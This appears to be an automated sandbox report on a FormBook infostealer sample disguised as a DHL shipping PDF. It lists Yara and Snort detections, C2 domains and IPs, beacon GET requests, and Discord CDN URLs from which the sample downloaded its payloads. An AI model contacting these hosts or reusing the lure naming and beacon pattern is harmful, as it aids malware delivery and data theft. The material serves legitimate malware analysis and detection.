Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: DHL AWB# 4AB19037XXX.pdf.exe

Joe Sandbox ML: detected

Source: 6.2.RegAsm.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49739 version: TLS 1.0

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: ediskcz.pdb source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
Source:	Binary string: ediskcz.pdbh; source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.416441384.0000000002DAF000.00000040.00000001.sdmp, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
Source:	Binary string: RegAsm.pdb source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp
Source:	Binary string: c:\Users\Administrator\Desktop\44.pdbTBnB `B_CorExeMainmscoree.dll source: DHL AWB# 4AB19037XXX.pdf.exe
Source:	Binary string: wntdll.pdb source: RegAsm.exe, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
Source:	Binary string: c:\Users\Administrator\Desktop\44.pdb source: DHL AWB# 4AB19037XXX.pdf.exe
Source:	Binary string: RegAsm.pdb4 source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp

Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe

Code function: 4x nop then jmp 00007FFC07D70B86h

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 178.254.0.81:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 178.254.0.81:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 178.254.0.81:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49842 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49842 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49842 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 185.15.197.14 80
Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe	Domain query: www.qq8.space
Source: C:\Windows\explorer.exe	Domain query: www.anushreehomemadeproducts.online
Source: C:\Windows\explorer.exe	Network Connect: 178.254.0.81 80
Source: C:\Windows\explorer.exe	Domain query: www.dependablelawnsnow.com
Source: C:\Windows\explorer.exe	Domain query: www.thera.xyz
Source: C:\Windows\explorer.exe	Domain query: www.laliinparfumeri.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.5.62 80
Source: C:\Windows\explorer.exe	Domain query: www.bjhaitaoshop.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.lighterthanlight.net

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.thera.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.dependablelawnsnow.com/o4um/

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /attachments/890478905998331907/891784228721807420/bin.pdf HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.laliinparfumeri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.lighterthanlight.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.dependablelawnsnow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.anushreehomemadeproducts.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.thera.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 52.58.78.16 52.58.78.16

Source: unknown

HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49739 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 18:38:38 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.317912811.000000001BFB0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp	String found in binary or memory: http://www.thera.xyz
Source: chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp	String found in binary or memory: http://www.thera.xyz/
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314671886.0000000002ECA000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/889935662827044904/889981640498090054/runpe.pdf
Source: DHL AWB# 4AB19037XXX.pdf.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/890478905998331907/891784228721807420/bin.pdf

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/890478905998331907/891784228721807420/bin.pdf HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/889935662827044904/889981640498090054/runpe.pdf HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=0ZTSB4q90pXvWn2TqwOUMvEVaTKS+JdNyJaEOeyzrKzgv7hy4stdYvgCEQe0HBbX8SxQ&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.laliinparfumeri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=NmWArNFcCM0eoZWDJYXkCpdPU4u48b3a02rAkKDw3xtvPLdWME8dWY2ZX0sn8dIRZYch&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.lighterthanlight.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=uOkBJSjIW3F6CP8rQxyvI2MBRBl8nhg0UoToBCoVSjs9ZXrMBkf12YfZAaFMMZR1Rm2X&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.dependablelawnsnow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=my1uKSCvdi1Dfs79c5aF+OWPglwEaruDjgZM5a49fOsGBH+Y4QWrHEYhu2ZyQtf7Uf64&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.anushreehomemadeproducts.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /o4um/?gBZ81XL=sLOz5fxzAB+rAW0hlPtJlSBTLXwWl5RPAfNZDklBst6583qURvc+7YZqdqws0gKI3hH9&0h-hGP=6lrHbNH0tTUDvPa HTTP/1.1Host: www.thera.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: DHL AWB# 4AB19037XXX.pdf.exe

Source: DHL AWB# 4AB19037XXX.pdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0041CB69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00408C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00408C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_02D822AE
